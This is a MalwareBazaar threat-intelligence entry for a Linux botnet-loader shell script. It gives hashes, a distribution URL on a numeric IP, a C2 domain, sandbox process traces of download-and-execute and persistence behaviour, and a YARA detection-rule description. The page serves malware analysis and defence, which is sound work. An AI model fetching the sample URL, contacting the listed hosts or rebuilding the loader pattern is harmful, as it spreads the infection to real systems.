MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 373bb1eae163c5766e0ed061f2373ef79866f10eae441657fc54cfcac9996224. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


Threat unknown


Vendor detections: 6


Intelligence 6 IOCs YARA 1 File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: 373bb1eae163c5766e0ed061f2373ef79866f10eae441657fc54cfcac9996224
SHA3-384 hash: b2a6e9113611abfc318cacd6689045d3e366b5d68dda027e458671d7f3e0c8a71abccecd8073107f70d4344cf2fa7461
SHA1 hash: 5e6aedbac8cf91fc0bca534574a4515bc9e9a5ba
MD5 hash: bf6c04b23c8b3aa13ef6991bc7002fe7
humanhash: iowa-texas-oxygen-robin
File name:bbc
Download: download sample
File size:517 bytes
First seen:2026-01-10 01:18:50 UTC
Last seen:2026-01-10 10:26:21 UTC
File type: sh
MIME type:text/x-shellscript
ssdeep 12:lSjkOLZpqjWx5ozpqF82Q/NiTSCB+0j8BHAOy:lzgZpqyxmzpqF82QVg7B2BgT
TLSH T16EF0270FB087F02A808435F89761F719AC3479A7A173DE9CB8853690FFC60207963244
TrID 70.0% (.SH) Linux/UNIX shell script (7000/1)
30.0% (.) Unix-like shebang (var.3) (gen) (3000/1)
Magika shell
Reporter abuse_ch
Tags:sh
URLMalware sample (SHA256 hash)SignatureTags
http://130.12.180.85/file/n/an/an/a

Intelligence

File Origin
# of uploads :
2
# of downloads :
105
Origin country :
DE DE
Vendor Threat Intelligence
No detections
Verdict:
Malicious
Threat level:
  10/10
Confidence:
100%
Tags:
busybox
Link:
https://www.filescan.io/uploads/6961f68030368802bb7efd45/reports/e3d05691-c8f1-4a94-b01a-dbb5320f515d/overview
Verdict:
Suspicious
Labled as:
Agent.TY
Link:
https://www.hybrid-analysis.com/sample/373bb1eae163c5766e0ed061f2373ef79866f10eae441657fc54cfcac9996224
Status:
terminated
Link:
https://sandbox.kunai.rocks/analysis/40a33a18-dfb6-4087-b9ab-c37f0b0755d9
Behavior Graph:
Download SVG
%3 guuid=fdf9897e-1900-0000-c6c1-ed42560b0000 pid=2902 /usr/bin/sudo guuid=53786e80-1900-0000-c6c1-ed425a0b0000 pid=2906 /tmp/sample.bin guuid=fdf9897e-1900-0000-c6c1-ed42560b0000 pid=2902->guuid=53786e80-1900-0000-c6c1-ed425a0b0000 pid=2906 execve guuid=120fb280-1900-0000-c6c1-ed425b0b0000 pid=2907 /usr/bin/uname guuid=53786e80-1900-0000-c6c1-ed425a0b0000 pid=2906->guuid=120fb280-1900-0000-c6c1-ed425b0b0000 pid=2907 execve guuid=49430c81-1900-0000-c6c1-ed425c0b0000 pid=2908 /usr/bin/busybox guuid=53786e80-1900-0000-c6c1-ed425a0b0000 pid=2906->guuid=49430c81-1900-0000-c6c1-ed425c0b0000 pid=2908 execve guuid=54944a81-1900-0000-c6c1-ed425e0b0000 pid=2910 /usr/bin/wget net send-data write-file guuid=53786e80-1900-0000-c6c1-ed425a0b0000 pid=2906->guuid=54944a81-1900-0000-c6c1-ed425e0b0000 pid=2910 execve guuid=0a21718a-1900-0000-c6c1-ed426d0b0000 pid=2925 /usr/bin/busybox guuid=53786e80-1900-0000-c6c1-ed425a0b0000 pid=2906->guuid=0a21718a-1900-0000-c6c1-ed426d0b0000 pid=2925 execve guuid=796b978a-1900-0000-c6c1-ed426f0b0000 pid=2927 /tmp/data.x86_64 net guuid=53786e80-1900-0000-c6c1-ed425a0b0000 pid=2906->guuid=796b978a-1900-0000-c6c1-ed426f0b0000 pid=2927 execve guuid=9dfdc08a-1900-0000-c6c1-ed42730b0000 pid=2931 /usr/bin/busybox delete-file guuid=53786e80-1900-0000-c6c1-ed425a0b0000 pid=2906->guuid=9dfdc08a-1900-0000-c6c1-ed42730b0000 pid=2931 execve guuid=8340e08a-1900-0000-c6c1-ed42740b0000 pid=2932 /usr/bin/busybox delete-file guuid=53786e80-1900-0000-c6c1-ed425a0b0000 pid=2906->guuid=8340e08a-1900-0000-c6c1-ed42740b0000 pid=2932 execve 465b7190-3501-545b-b6aa-fbcf9cff6a23 130.12.180.85:80 guuid=54944a81-1900-0000-c6c1-ed425e0b0000 pid=2910->465b7190-3501-545b-b6aa-fbcf9cff6a23 send: 144B 8b0a01dc-0728-52c1-8024-c4ba7801b8d6 8.8.8.8:53 guuid=796b978a-1900-0000-c6c1-ed426f0b0000 pid=2927->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con guuid=a4ccb78a-1900-0000-c6c1-ed42710b0000 pid=2929 /tmp/data.x86_64 guuid=796b978a-1900-0000-c6c1-ed426f0b0000 pid=2927->guuid=a4ccb78a-1900-0000-c6c1-ed42710b0000 pid=2929 clone guuid=2fcabd8a-1900-0000-c6c1-ed42720b0000 pid=2930 /tmp/data.x86_64 write-config zombie guuid=a4ccb78a-1900-0000-c6c1-ed42710b0000 pid=2929->guuid=2fcabd8a-1900-0000-c6c1-ed42720b0000 pid=2930 clone guuid=c2f5048b-1900-0000-c6c1-ed42750b0000 pid=2933 /usr/bin/dash guuid=2fcabd8a-1900-0000-c6c1-ed42720b0000 pid=2930->guuid=c2f5048b-1900-0000-c6c1-ed42750b0000 pid=2933 execve guuid=683e278c-1900-0000-c6c1-ed42780b0000 pid=2936 /tmp/data.x86_64 dns net send-data write-file zombie guuid=2fcabd8a-1900-0000-c6c1-ed42720b0000 pid=2930->guuid=683e278c-1900-0000-c6c1-ed42780b0000 pid=2936 clone guuid=a8913b8b-1900-0000-c6c1-ed42760b0000 pid=2934 /usr/bin/cp guuid=c2f5048b-1900-0000-c6c1-ed42750b0000 pid=2933->guuid=a8913b8b-1900-0000-c6c1-ed42760b0000 pid=2934 execve guuid=683e278c-1900-0000-c6c1-ed42780b0000 pid=2936->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 send: 34B c7f3fd6c-df8f-501c-b378-7ce65631888c cyber-reborn.com:25565 guuid=683e278c-1900-0000-c6c1-ed42780b0000 pid=2936->c7f3fd6c-df8f-501c-b378-7ce65631888c send: 14B guuid=223c328c-1900-0000-c6c1-ed42790b0000 pid=2937 /tmp/data.x86_64 guuid=683e278c-1900-0000-c6c1-ed42780b0000 pid=2936->guuid=223c328c-1900-0000-c6c1-ed42790b0000 pid=2937 clone guuid=af71d08c-1900-0000-c6c1-ed427c0b0000 pid=2940 /usr/bin/dash guuid=683e278c-1900-0000-c6c1-ed42780b0000 pid=2936->guuid=af71d08c-1900-0000-c6c1-ed427c0b0000 pid=2940 execve guuid=d45e2e98-1900-0000-c6c1-ed42970b0000 pid=2967 /usr/bin/dash guuid=683e278c-1900-0000-c6c1-ed42780b0000 pid=2936->guuid=d45e2e98-1900-0000-c6c1-ed42970b0000 pid=2967 execve guuid=f0b4438c-1900-0000-c6c1-ed427a0b0000 pid=2938 /usr/bin/dash guuid=223c328c-1900-0000-c6c1-ed42790b0000 pid=2937->guuid=f0b4438c-1900-0000-c6c1-ed427a0b0000 pid=2938 execve guuid=0d37f78c-1900-0000-c6c1-ed427e0b0000 pid=2942 /usr/sbin/xtables-nft-multi guuid=af71d08c-1900-0000-c6c1-ed427c0b0000 pid=2940->guuid=0d37f78c-1900-0000-c6c1-ed427e0b0000 pid=2942 execve guuid=77136198-1900-0000-c6c1-ed42990b0000 pid=2969 /usr/sbin/xtables-nft-multi guuid=d45e2e98-1900-0000-c6c1-ed42970b0000 pid=2967->guuid=77136198-1900-0000-c6c1-ed42990b0000 pid=2969 execve
Score:
33%
Verdict:
Susipicious
File Type:
SCRIPT
Link:
https://malprob.io/report/373bb1eae163c5766e0ed061f2373ef79866f10eae441657fc54cfcac9996224
Detection:
n/a
Link:
https://mwdb.cert.pl/sample/373bb1eae163c5766e0ed061f2373ef79866f10eae441657fc54cfcac9996224/
Detection(s):
Suspicious file
Link:
https://check.spamhaus.org/check/?searchterm=g453d2xbmpcxm3qo2bq7enz666mgn4iovzcbmv74kth4vsmzmisa._file
Result
Malware family:
n/a
Score:
  7/10
Tags:
credential_access defense_evasion discovery linux persistence
Link:
https://tria.ge/reports/260110-hlnaaags7e/
Behaviour
Reads runtime system information
System Network Configuration Discovery
Writes file to tmp directory
Changes its process name
Reads system network configuration
Reads process memory
Enumerates active TCP sockets
Enumerates running processes
Modifies init.d
Modifies rc script
File and Directory Permissions Modification
Executes dropped EXE
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
Malicious File
Score:
0.95
Link:
https://yomi.yoroi.company/submissions/373bb1eae163c5766e0ed061f2373ef79866f10eae441657fc54cfcac9996224

YARA Signatures

MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name:MAL_Linux_IoT_MultiArch_BotnetLoader_Generic
Create hunting rule
Author:Anish Bogati
Description:Technique-based detection of IoT/Linux botnet loader shell scripts downloading binaries from numeric IPs, chmodding, and executing multi-architecture payloads
Reference:MalwareBazaar sample lilin.sh

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Web download

sh 373bb1eae163c5766e0ed061f2373ef79866f10eae441657fc54cfcac9996224

(this sample)

  
URLhaus
https://urlhaus.abuse.ch/url/3753785/
  
Delivery method
Distributed via web download

Comments